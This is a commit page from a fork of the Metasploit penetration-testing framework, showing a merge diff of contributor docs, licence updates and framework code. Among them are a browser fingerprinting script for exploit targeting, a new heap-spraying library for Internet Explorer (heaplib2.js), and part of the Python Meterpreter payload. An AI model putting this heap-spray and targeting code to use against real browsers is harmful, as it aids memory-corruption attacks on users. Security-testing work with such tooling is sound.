adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'metasploit-framework/master' into masked-cred-format-update

Browse Source
This commit is contained in:
Samuel Huckins
2014-03-19 15:47:46 -05:00
parent a78bc822d0 c1cbeff5f0
commit cc4c958d58
999 changed files with 41688 additions and 14294 deletions
Download Patch File Download Diff File Expand all files Collapse all files
.travis.yml
+6 -2
View File
@@ -1,11 +1,15 @@
language: ruby
env: MSF_SPOTCHECK_RECENT=1
before_install:
- rake --version
- sudo apt-get update -qq
- sudo apt-get install -qq libpcap-dev
before_script:
- ./tools/msftidy.rb
- cp config/database.yml.travis config/database.yml
- rake db:create
- rake db:migrate
- bundle exec rake --version
- bundle exec rake db:create
- bundle exec rake db:migrate
rvm:
#- '1.8.7'
CONTRIBUTING.md
+58 -34
View File
@@ -1,44 +1,68 @@
# Contributing to Metasploit
## Reporting Bugs
Thanks for your interest in making Metasploit -- and therefore, the
world -- a better place! What you see here in CONTRIBUTING.md is a
bullet-point list of the do's and don'ts of how to make sure *your*
valuable contributions actually make it into Metasploit's master branch.
If you would like to report a bug, please take a look at [our Redmine
issue
tracker](https://dev.metasploit.com/redmine/projects/framework/issues?query_id=420)
-- your bug may already have been reported there! Simply [searching](https://dev.metasploit.com/redmine/projects/framework/search) for some appropriate keywords may save everyone a lot of hassle.
If you care not to follow these rules, your contribution **will** be
closed (*Road House* style). Sorry!
If your bug is new and you'd like to report it you will need to
[register
first](https://dev.metasploit.com/redmine/account/register). Don't
worry, it's easy and fun and takes about 30 seconds.
Incidentally, this is a **short** list. The
[wiki](https://github.com/rapid7/metasploit-framework/wiki) is much more
exhaustive and reveals many mysteries. If you read nothing else, take a
look at the standard [development environment setup
guide](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment)
and Metasploit's [Common Coding Mistakes](https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes).
When you file a bug report, please include your **steps to reproduce**,
full copy-pastes of Ruby stack traces, and any relevant details about
your environment. Without repro steps, your bug will likely be closed.
With repro steps, your bugs will likely be fixed.
## Code Contributions
## Contributing Metasploit Modules
* **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide).
* **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages.
* **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`.
If you have an exploit that you'd like to contribute to the Metasploit
Framework, please familiarize yourself with the
**[HACKING](https://github.com/rapid7/metasploit-framework/blob/master/HACKING)**
document in the
Metasploit-Framework repository. There are many mysteries revealed in
HACKING concerning code style and content.
### Pull Requests
[Pull requests](https://github.com/rapid7/metasploit-framework/pulls)
should corellate with modules at a 1:1 ratio
-- there is rarely a good reason to have two, three, or ten modules on
one pull request, as this dramatically increases the review time
required to land (commit) any of those modules.
* **Do** specify a descriptive title to make searching for your pull request easier.
* **Do** include [console output](https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks), especially for witnessable effects in `msfconsole`.
* **Do** list [verification steps](https://help.github.com/articles/writing-on-github#task-lists) so your code is testable.
* **Don't** leave your pull request description blank.
* **Don't** abandon your pull request. Being responsive helps us land your code faster.
Pull requests tend to be very collaborative for Metasploit -- do not be
surprised if your pull request to rapid7/metasploit-framework triggers a
pull request back to your own fork. In this way, we can isolate working
changes before landing your PR to the Metasploit master branch.
Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940) and [#3043](https://github.com/rapid7/metasploit-framework/pull/3043) are a couple good examples to follow.
To save yourself the embarrassment of committing common errors, you will
want to symlink the `msftidy.rb` utility to your pre-commit hooks by
running `ln -s ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit`
from the top-level directory of your metasploit-framework clone. This
will prevent you from committing modules that raise WARNINGS or ERRORS.
#### New Modules
* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
* **Do** use the [API](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
* **Don't** include more than one module per pull request.
#### Library Code
* **Do** write [RSpec](http://rspec.info/) tests - even the smallest change in library land can thoroughly screw things up.
* **Do** follow [Better Specs](http://betterspecs.org/) - it's like the style guide for specs.
* **Do** write [YARD](http://yardoc.org/) documentation - this makes it easier for people to use your code.
#### Bug Fixes
* **Do** include reproduction steps in the form of verification steps.
* **Do** include a link to the corresponding [Redmine](https://dev.metasploit.com/redmine/projects/framework) issue in the format of `SeeRM #1234` in your commit description.
## Bug Reports
* **Do** report vulnerabilities in Rapid7 software to security@rapid7.com.
* **Do** create a Redmine account and report your bug there.
* **Do** write a detailed description of your bug and use a descriptive title.
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
* **Don't** file duplicate reports - search for your bug before filing a new report.
* **Don't** report a bug on GitHub. Use [Redmine](https://dev.metasploit.com/redmine/projects/framework) instead.
Redmine issues [#8762](https://dev.metasploit.com/redmine/issues/8762) and [#8764](https://dev.metasploit.com/redmine/issues/8764) are a couple good examples to follow.
If you need some more guidance, talk to the main body of open
source contributors over on the [Freenode IRC channel](http://webchat.freenode.net/?channels=%23metasploit&uio=d4)
or e-mail us at [metasploit-hackers](https://lists.sourceforge.net/lists/listinfo/metasploit-hackers)
mailing list.
Also, **thank you** for taking the few moments to read this far! You're
already way ahead of the curve, so keep it up!
COPYING
+1 -1
View File
@@ -1,4 +1,4 @@
Copyright (C) 2006-2013, Rapid7 Inc.
Copyright (C) 2006-2013, Rapid7, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
HACKING
+22 -130
View File
@@ -1,146 +1,38 @@
# $Id$
HACKING
=======
This file contains some brief instructions on contributing to the
Metasploit Framework.
(Last updated: 2014-03-04)
Code Style
==========
This document almost entirely deprecated by:
In order to maintain consistency and readability, we ask that you
adhere to the following style guidelines:
CONTRIBUTING.md
- Standard Ruby two-space soft tabs, not hard tabs.
- Try to keep your lines under 100 columns (assuming two-space tabs)
- do; end instead of {} for a block
- Always use str[0,1] instead of str[0]
(This avoids a known ruby 1.8/1.9 incompatibility.)
- Method names should always be lower_case and words separated by "_"
- Variable names should be lower case with words separated by "_"
- Don't depend on any external gems or libraries without talking to
todb to resolve packaging and licensing issues
You can use the the "./tools/msftidy.rb" script to do some rudimentary
checking for various violations.
Code No-Nos
===========
1. Don't print to standard output. Doing so means that users of
interfaces other than msfconsole, such as msfrpc and msfgui, won't see
your output. You can use print_line to accomplish the same thing as
puts.
2. Don't read from standard input, doing so will make your code
lock up the entire module when called from other interfaces. If you
need user input, you can either register an option or expose an
interactive session type specific for the type of exploit.
3. Always use Rex sockets, not ruby sockets. This includes
third-party libraries such as Net::Http. There are several very good
reasons for this rule. First, the framework doesn't get notified on
the creation of ruby sockets and won't know how to clean them up in
case your module raises an exception without cleaning up after itself.
Secondly, non-Rex sockets do not know about routes and therefore can't
be used through a meterpreter tunnel. Lastly, regular sockets miss
out on msf's proxy and SSL features. Msf includes many protocols
already implemented with Rex and if the protocol you need is missing,
porting another library to use them is straight-forward. See our
Net::SSH modifications in lib/net/ssh/ for an example.
4. When opening an IO stream, always force binary with "b" mode (or
using IO#binmode). This not only helps keep Windows and non-Windows
runtime environments consistent with each other, but also guarantees
that files will be treated as ASCII-8BIT instead of UTF-8.
5. Don't use String#[] for a single character. This returns a Fixnum in
ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
str[idx,1]
which always returns a String. If you need the ASCII byte, unpack it like
so:
tr[idx,1].unpack("C")[0]
6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
The '<<' operator is significantly faster. The difference will become
even more apparent when doing string manipulation in a loop. The
following table approximates the underlying implementation:
Ruby Pseudo-C
----------- ----------------
a = b + c a = malloc(b.len+c.len+1);
strcpy(a, b);
memcpy(a+b.len, c, c.len);
a[b.len + c.len] = '\0';
a = b a = b;
a << c a = realloc(a, a.len+c.len+1);
memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0';
Note that the original value of 'b' is lost in the second case. Care
must be taken to duplicate strings that you do not want to modify.
7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
for an overview of common and not-so-common Ruby version related gotchas.
8. Never, ever use $global variables. This applies to modules, mixins,
and libraries. If you need a "global" within a specific class, you can
use @@class_variables, but most modules should use @instance variables
to store information between methods.
9. Don't craft your XML document raw or by using Nokogiri, the current
preferred way is REXML.
Creating New Modules
====================
When creating a new module, the simplest way to start is to copy
another module that uses the same protocol and modify it to your
needs. If you're creating an exploit module, generally you'll want
to edit the exploit() method. Auxiliary Scanner modules use one of
run_host(), run_range(), or run_batch() instead of exploit().
Non-scanner aux modules use run().
Submitting Your Code
====================
To get started with a Metasploit Framework source clone, simply:
- Fork rapid7/metasploit-framework to your GitHub account
- git clone git://github.com/YourName/metasploit-framework.git
- gem install bundler
- bundle install
More detailed documentation regarding the process for submitting new
modules via GitHub is documented here:
in the same directory as this file, and to a lesser extent:
The Metasploit Development Environment
https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment
This describes the process of forking, editing, and generating a
pull request, and is the preferred method for bringing new modules
and framework enhancements to the attention of the core Metasploit
development team. Note that this process requires a GitHub account.
Common Coding Mistakes
https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
For Git commits, please adhere to 50/72 formatting: your commits should
start with a line 50 characters or less, followed by a blank line,
followed by one or more lines of explanatory text wrapped at at 72
characters Pull requests with commits not formatted this way will
be rejected without review.
The Ruby Style Guide
https://github.com/bbatsov/ruby-style-guide
For modules, note that Author field is not automatic, and should be
filled in in the format of 'Your Name <user[at]domain.tld>' so future
developers can contact you with any questions.
Ruby 1.9: What to Expect
http://slideshow.rubyforge.org/ruby19.html
You can use the the "./tools/msftidy.rb" script against your new and
changed modules to do some rudimentary checking for various style and
syntax violations.
Licensing for Your New Content
==============================
Licensing
=========
By submitting code contributions to the Metasploit Project it is
assumed that you are offering your code under the Metasploit License
or similar 3-clause BSD-compatible license. MIT and Ruby Licenses
or similar 3-clause BSD-compatible license. MIT and Ruby Licenses
are also fine. We specifically cannot include GPL code. LGPL code
is accepted on a case by case basis for libraries only and is never
is accepted on a case by case basis for libraries only and is never
accepted for modules.
When possible, such as aux and exploit modules, be sure to include
your license designation in the file in the appropriate place.
LICENSE
+17 -4
View File
@@ -2,19 +2,23 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Source: http://www.metasploit.com/
Files: *
Copyright: 2006-2013, Rapid7 Inc.
Copyright: 2006-2014, Rapid7, Inc.
License: BSD-3-clause
# The Metasploit Framework is provided under the 3-clause BSD license provided
# at the end of this file.
#
# The copyright on this package is held by Rapid7 LLC.
# The copyright on this package is held by Rapid7, Inc.
#
# This license does not apply to third-party components detailed below.
#
# Last updated: 2013-Nov-04
#
Files: data/templates/to_mem_pshreflection.ps1.template
Copyright: 2012, Matthew Graeber
License: BSD-3-clause
Files: data/john/*
Copyright: 1996-2011 Solar Designer.
License: GPL-2
@@ -80,7 +84,7 @@ Copyright: 2005-2009, Joel VanderWerf
License: Ruby
Files: lib/fastlib.rb
Copyright: 2011, Rapid7 Inc.
Copyright: 2011, Rapid7, Inc.
License: Ruby
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
@@ -147,6 +151,11 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
License: BSD-3-clause
Files: data/webcam/api.js
Copyright: Copyright 2013 Muaz Khan<@muazkh>.
License: MIT
#
# Gems
#
@@ -167,6 +176,10 @@ Files: arel
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: bcrypt-ruby
Copyright: 2007-2011 Coda Hale
License: MIT
Files: builder
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
@@ -301,7 +314,7 @@ License: BSD-3-clause
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
.
* Neither the name of Rapid7 LLC nor the names of its contributors
* Neither the name of Rapid7, Inc. nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
.
data/exploits/capture/http/forms/extractforms.rb
+1 -1
View File
@@ -1,6 +1,6 @@
#!/usr/bin/env ruby
# Copyright (C) 2008 Metasploit LLC
# Copyright (C) 2008 Rapid7, Inc.
#
# This script extracts the forms from the main page of each
data/exploits/capture/http/forms/grabforms.rb
+1 -1
View File
@@ -1,6 +1,6 @@
#!/usr/bin/env ruby
# Copyright (C) 2008 Metasploit LLC
# Copyright (C) 2008 Rapid7, Inc.
#
# This script extracts the forms from the main page of each
data/exploits/cve-2013-3881/cve-2013-3881.x86.dll
Executable
BIN
View File
Binary file not shown.
data/exploits/cve-2014-1610/metasploit.djvu
BIN
View File
Binary file not shown.
data/exploits/cve-2014-1610/readme.md
+1
View File
@@ -0,0 +1 @@
Any DjVu file can be used this is just a snazzy Metasploit one
data/js/detect/os.js
+21 -3
View File
@@ -184,6 +184,9 @@ window.os_detect.getVersion = function(){
} else if (platform.match(/arm/)) {
// Android and maemo
arch = arch_armle;
if (navigator.userAgent.match(/android/i)) {
os_flavor = 'Android';
}
}
} else if (platform.match(/windows/)) {
os_name = oses_windows;
@@ -193,8 +196,7 @@ window.os_detect.getVersion = function(){
if (!ua_version || 0 == ua_version.length) {
ua_is_lying = true;
}
} else if (!document.all && navigator.taintEnabled ||
'MozBlobBuilder' in window) {
} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
// Use taintEnabled to identify FF since other recent browsers
// implement window.getComputedStyle now. For some reason, checking for
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
@@ -210,7 +212,11 @@ window.os_detect.getVersion = function(){
// Thanks to developer.mozilla.org "Firefox for developers" series for most
// of these.
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
if (css_is_valid('image-orientation',
if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) {
ua_version = '28.0';
} else if (css_is_valid('cursor', 'cursor', 'grab')) {
ua_version = '27.0';
} else if (css_is_valid('image-orientation',
'imageOrientation',
'0deg')) {
ua_version = '26.0';
@@ -877,6 +883,18 @@ window.os_detect.getVersion = function(){
os_flavor = "7";
os_sp = "SP1";
break;
case "11016428":
// IE 11.0.9600.16428 / Windows 7 SP1
ua_version = "11.0";
os_flavor = "7";
os_sp = "SP1";
break;
case "10016384":
// IE 10.0.9200.16384 / Windows 8 x86
ua_version = "10.0";
os_flavor = "8";
os_sp = "SP0";
break;
case "1000":
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
ua_version = "10.0";
data/js/memory/heaplib2.js
+192
View File
@@ -0,0 +1,192 @@
//heapLib2 namespace
function heapLib2() { }
//These are attributes that will not actually create a bstr
//and directly use the back-end allocator, completely bypassing the cache
var global_attrs = ["title", "lang", "class"];
heapLib2.ie = function(element, maxAlloc)
{
//128mb
this.maxAlloc = 0x8000000;
//make sure that an HTML DOM element is passed
if(!element.nodeType || element.nodeType != 1)
throw "alloc.argument: element not valid";
this.element = element;
if(maxAlloc)
this.maxAlloc = maxAlloc;
//empty the cache
this.Oleaut32EmptyCache();
this.Oleaut32FillCache();
this.Oleaut32EmptyCache();
}
heapLib2.ie.prototype.newelement = function(element)
{
//make sure that an HTML DOM element is passed
if(!element.nodeType || element.nodeType != 1)
throw "alloc.argument: element not valid";
this.element = element;
}
heapLib2.ie.prototype.alloc = function(attr_name, size, cache_ok)
{
if(typeof(cache_ok)==='undefined')
cache_ok = false;
else
cache_ok = true;
//make sure the attribute name is a string
if(typeof attr_name != "string")
throw "alloc.argument: attr_name is not a string";
//make sure that the attribute name is not already present in the html element
if(this.element.getAttribute(attr_name))
throw "alloc.argument: element already contains attr_name: " + attr_name;
//ensure the size is a number
if(typeof size != "number")
throw "alloc.argument: size is not a number: " + size;
//make sure the size isn't one of the special values
if(!cache_ok && (size == 0x20 || size == 0x40 || size == 0x100 || size == 0x8000))
throw "alloc.argument: size cannot be flushed from cache: " + size;
if(size > this.maxAlloc)
throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
//the size must be at a 16-byte boundary this can be commented out but
//the allocations will be rounded to the nearest 16-byte boundary
if(size % 16 != 0)
throw "alloc.argument: size be a multiple of 16: " + size;
//20-bytes will be added to the size
//<4-byte size><data><2-byte null>
size = ((size / 2) - 6);
//May have to change this due to allocation side effects
var data = new Array(size).join(cache_ok ? "C" : "$");
var attr = document.createAttribute(attr_name);
this.element.setAttributeNode(attr);
this.element.setAttribute(attr_name, data);
}
//These items will allocate/free memory and should really
//only be used once per element. You can use a new element
//by calling the 'newelement' method above
heapLib2.ie.prototype.alloc_nobstr = function(val)
{
//make sure the aval is a string
if(typeof val != "string")
throw "alloc.argument: val is not a string";
var size = (val.length * 2) + 6;
if(size > this.maxAlloc)
throw "alloc_nobstr.val: string length cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
var i = 0;
var set_gattr = 0;
for(i = 0; i < global_attrs.length; i++)
{
curr_gattr = global_attrs[i];
if(!this.element.getAttribute(curr_gattr))
{
this.element.setAttribute(curr_gattr, "");
this.element.setAttribute(curr_gattr, val);
set_gattr = 1;
break;
}
}
if(set_gattr == 0)
throw "alloc_nobstr: all global attributes are assigned, try a new element";
}
//completely bypass the cache, useful for heap spraying (see heapLib2_test.html)
heapLib2.ie.prototype.sprayalloc = function(attr_name, str)
{
//make sure the attribute name is a string
if(typeof attr_name != "string")
throw "alloc.argument: attr_name is not a string";
//make sure that the attribute name is not already present in the html element
if(this.element.getAttribute(attr_name))
throw "alloc.argument: element already contains attr_name: " + attr_name;
//ensure the size is a number
if(typeof str != "string")
throw "alloc.argument: str is not a string: " + typeof str;
var size = (str.length * 2) + 6;
//make sure the size isn't one of the special values
if(size <= 0x8000)
throw "alloc.argument: bigalloc must be greater than 0x8000: " + size;
if(size > this.maxAlloc)
throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size;
var attr = document.createAttribute(attr_name);
this.element.setAttributeNode(attr);
this.element.setAttribute(attr_name, str);
}
heapLib2.ie.prototype.free = function(attr_name, skip_flush)
{
if(typeof(skip_flush)==='undefined')
skip_flush = false;
else
skip_flush = true;
//make sure that an HTML DOM element is passed
if(!this.element.nodeType || this.element.nodeType != 1)
throw "alloc.argument: element not valid";
//make sure the attribute name is a string
if(typeof attr_name != "string")
throw "alloc.argument: attr_name is not a string";
//make sure that the attribute name is not already present in the html element
if(!this.element.getAttribute(attr_name))
throw "alloc.argument: element does not contain attribute: " + attr_name;
//make sure the cache is full so the chunk returns the general purpose heap
if(!skip_flush)
this.Oleaut32FillCache();
this.element.setAttribute(attr_name, null);
if(!skip_flush)
this.Oleaut32EmptyCache()
}
heapLib2.ie.prototype.Oleaut32FillCache = function()
{
for(var i = 0; i < 6; i++)
{
this.free("cache0x20"+i, true);
this.free("cache0x40"+i, true);
this.free("cache0x100"+i, true);
this.free("cache0x8000"+i, true);
}
}
heapLib2.ie.prototype.Oleaut32EmptyCache = function()
{
for(var i = 0; i < 6; i++)
{
this.alloc("cache0x20"+i, 0x20, true);
this.alloc("cache0x40"+i, 0x40, true);
this.alloc("cache0x100"+i, 0x100, true);
this.alloc("cache0x8000"+i, 0x8000, true);
}
}
data/js/network/ajax_post.js
+11 -3
View File
@@ -1,10 +1,18 @@
function postInfo(path, data) {
function postInfo(path, data, cb) {
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open('POST', path, false);
xmlHttp.open('POST', path, !!cb);
if (cb) {
xmlHttp.onreadystatechange = function() {
if (xmlHttp.readyState == 4) { cb.apply(this, arguments); }
};
}
xmlHttp.send(data);
}
return xmlHttp;
}
data/meterpreter/common.lib
BIN
View File
Binary file not shown.
data/meterpreter/elevator.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/elevator.x86.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_espia.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_espia.x86.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_extapi.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_extapi.x86.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_incognito.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_incognito.x86.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_lanattacks.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_lanattacks.x86.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_mimikatz.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_mimikatz.x86.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_networkpug.lso
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_priv.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_priv.x86.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_sniffer.lso
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_sniffer.x64.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_sniffer.x86.dll
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_stdapi.lso
BIN
View File
Binary file not shown.
data/meterpreter/ext_server_stdapi.py
+519 -66
View File
@@ -1,4 +1,3 @@
import ctypes
import fnmatch
import getpass
import os
@@ -9,8 +8,15 @@ import socket
import struct
import subprocess
import sys
import time
has_windll = hasattr(ctypes, 'windll')
try:
import ctypes
has_ctypes = True
has_windll = hasattr(ctypes, 'windll')
except ImportError:
has_ctypes = False
has_windll = False
try:
import pty
@@ -24,6 +30,12 @@ try:
except ImportError:
has_pwd = False
try:
import SystemConfiguration as osxsc
has_osxsc = True
except ImportError:
has_osxsc = False
try:
import termios
has_termios = True
@@ -36,52 +48,197 @@ try:
except ImportError:
has_winreg = False
class PROCESSENTRY32(ctypes.Structure):
_fields_ = [("dwSize", ctypes.c_uint32),
("cntUsage", ctypes.c_uint32),
("th32ProcessID", ctypes.c_uint32),
("th32DefaultHeapID", ctypes.c_void_p),
("th32ModuleID", ctypes.c_uint32),
("cntThreads", ctypes.c_uint32),
("th32ParentProcessID", ctypes.c_uint32),
("thPriClassBase", ctypes.c_int32),
("dwFlags", ctypes.c_uint32),
("szExeFile", (ctypes.c_char * 260))]
if has_ctypes:
#
# Windows Structures
#
class SOCKADDR(ctypes.Structure):
_fields_ = [("sa_family", ctypes.c_ushort),
("sa_data", (ctypes.c_uint8 * 14))]
class SYSTEM_INFO(ctypes.Structure):
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
("wReserved", ctypes.c_uint16),
("dwPageSize", ctypes.c_uint32),
("lpMinimumApplicationAddress", ctypes.c_void_p),
("lpMaximumApplicationAddress", ctypes.c_void_p),
("dwActiveProcessorMask", ctypes.c_uint32),
("dwNumberOfProcessors", ctypes.c_uint32),
("dwProcessorType", ctypes.c_uint32),
("dwAllocationGranularity", ctypes.c_uint32),
("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16),]
class SOCKET_ADDRESS(ctypes.Structure):
_fields_ = [("lpSockaddr", ctypes.POINTER(SOCKADDR)),
("iSockaddrLength", ctypes.c_int)]
class SID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [("Sid", ctypes.c_void_p),
("Attributes", ctypes.c_uint32),]
class IP_ADAPTER_UNICAST_ADDRESS(ctypes.Structure):
_fields_ = [
("s", type(
'_s_IP_ADAPTER_UNICAST_ADDRESS',
(ctypes.Structure,),
dict(_fields_ = [
("Length", ctypes.c_ulong),
("Flags", ctypes.c_uint32)
])
)),
("Next", ctypes.c_void_p),
("Address", SOCKET_ADDRESS),
("PrefixOrigin", ctypes.c_uint32),
("SuffixOrigin", ctypes.c_uint32),
("DadState", ctypes.c_uint32),
("ValidLifetime", ctypes.c_ulong),
("PreferredLifetime", ctypes.c_ulong),
("LeaseLifetime", ctypes.c_ulong),
("OnLinkPrefixLength", ctypes.c_uint8)]
##
# STDAPI
##
class IP_ADAPTER_ADDRESSES(ctypes.Structure):
_fields_ = [
("u", type(
'_u_IP_ADAPTER_ADDRESSES',
(ctypes.Union,),
dict(_fields_ = [
("Alignment", ctypes.c_ulonglong),
("s", type(
'_s_IP_ADAPTER_ADDRESSES',
(ctypes.Structure,),
dict(_fields_ = [
("Length", ctypes.c_ulong),
("IfIndex", ctypes.c_uint32)
])
))
])
)),
("Next", ctypes.c_void_p),
("AdapterName", ctypes.c_char_p),
("FirstUnicastAddress", ctypes.c_void_p),
("FirstAnycastAddress", ctypes.c_void_p),
("FirstMulticastAddress", ctypes.c_void_p),
("FirstDnsServerAddress", ctypes.c_void_p),
("DnsSuffix", ctypes.c_wchar_p),
("Description", ctypes.c_wchar_p),
("FriendlyName", ctypes.c_wchar_p),
("PhysicalAddress", (ctypes.c_uint8 * 8)),
("PhysicalAddressLength", ctypes.c_uint32),
("Flags", ctypes.c_uint32),
("Mtu", ctypes.c_uint32),
("IfType", ctypes.c_uint32),
("OperStatus", ctypes.c_uint32),
("Ipv6IfIndex", ctypes.c_uint32),
("ZoneIndices", (ctypes.c_uint32 * 16)),
("FirstPrefix", ctypes.c_void_p),
("TransmitLinkSpeed", ctypes.c_uint64),
("ReceiveLinkSpeed", ctypes.c_uint64),
("FirstWinsServerAddress", ctypes.c_void_p),
("FirstGatewayAddress", ctypes.c_void_p),
("Ipv4Metric", ctypes.c_ulong),
("Ipv6Metric", ctypes.c_ulong),
("Luid", ctypes.c_uint64),
("Dhcpv4Server", SOCKET_ADDRESS),
("CompartmentId", ctypes.c_uint32),
("NetworkGuid", (ctypes.c_uint8 * 16)),
("ConnectionType", ctypes.c_uint32),
("TunnelType", ctypes.c_uint32),
("Dhcpv6Server", SOCKET_ADDRESS),
("Dhcpv6ClientDuid", (ctypes.c_uint8 * 130)),
("Dhcpv6ClientDuidLength", ctypes.c_ulong),
("Dhcpv6Iaid", ctypes.c_ulong),
("FirstDnsSuffix", ctypes.c_void_p)]
class MIB_IFROW(ctypes.Structure):
_fields_ = [("wszName", (ctypes.c_wchar * 256)),
("dwIndex", ctypes.c_uint32),
("dwType", ctypes.c_uint32),
("dwMtu", ctypes.c_uint32),
("dwSpeed", ctypes.c_uint32),
("dwPhysAddrLen", ctypes.c_uint32),
("bPhysAddr", (ctypes.c_uint8 * 8)),
("dwAdminStatus", ctypes.c_uint32),
("dwOperStaus", ctypes.c_uint32),
("dwLastChange", ctypes.c_uint32),
("dwInOctets", ctypes.c_uint32),
("dwInUcastPkts", ctypes.c_uint32),
("dwInNUcastPkts", ctypes.c_uint32),
("dwInDiscards", ctypes.c_uint32),
("dwInErrors", ctypes.c_uint32),
("dwInUnknownProtos", ctypes.c_uint32),
("dwOutOctets", ctypes.c_uint32),
("dwOutUcastPkts", ctypes.c_uint32),
("dwOutNUcastPkts", ctypes.c_uint32),
("dwOutDiscards", ctypes.c_uint32),
("dwOutErrors", ctypes.c_uint32),
("dwOutQLen", ctypes.c_uint32),
("dwDescrLen", ctypes.c_uint32),
("bDescr", (ctypes.c_char * 256))]
class MIB_IPADDRROW(ctypes.Structure):
_fields_ = [("dwAddr", ctypes.c_uint32),
("dwIndex", ctypes.c_uint32),
("dwMask", ctypes.c_uint32),
("dwBCastAddr", ctypes.c_uint32),
("dwReasmSize", ctypes.c_uint32),
("unused1", ctypes.c_uint16),
("wType", ctypes.c_uint16)]
class PROCESSENTRY32(ctypes.Structure):
_fields_ = [("dwSize", ctypes.c_uint32),
("cntUsage", ctypes.c_uint32),
("th32ProcessID", ctypes.c_uint32),
("th32DefaultHeapID", ctypes.c_void_p),
("th32ModuleID", ctypes.c_uint32),
("cntThreads", ctypes.c_uint32),
("th32ParentProcessID", ctypes.c_uint32),
("thPriClassBase", ctypes.c_int32),
("dwFlags", ctypes.c_uint32),
("szExeFile", (ctypes.c_char * 260))]
class SID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [("Sid", ctypes.c_void_p),
("Attributes", ctypes.c_uint32)]
class SYSTEM_INFO(ctypes.Structure):
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
("wReserved", ctypes.c_uint16),
("dwPageSize", ctypes.c_uint32),
("lpMinimumApplicationAddress", ctypes.c_void_p),
("lpMaximumApplicationAddress", ctypes.c_void_p),
("dwActiveProcessorMask", ctypes.c_uint32),
("dwNumberOfProcessors", ctypes.c_uint32),
("dwProcessorType", ctypes.c_uint32),
("dwAllocationGranularity", ctypes.c_uint32),
("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16)]
#
# Linux Structures
#
class IFADDRMSG(ctypes.Structure):
_fields_ = [("family", ctypes.c_uint8),
("prefixlen", ctypes.c_uint8),
("flags", ctypes.c_uint8),
("scope", ctypes.c_uint8),
("index", ctypes.c_int32)]
class IFINFOMSG(ctypes.Structure):
_fields_ = [("family", ctypes.c_uint8),
("pad", ctypes.c_int8),
("type", ctypes.c_uint16),
("index", ctypes.c_int32),
("flags", ctypes.c_uint32),
("chagen", ctypes.c_uint32)]
class NLMSGHDR(ctypes.Structure):
_fields_ = [("len", ctypes.c_uint32),
("type", ctypes.c_uint16),
("flags", ctypes.c_uint16),
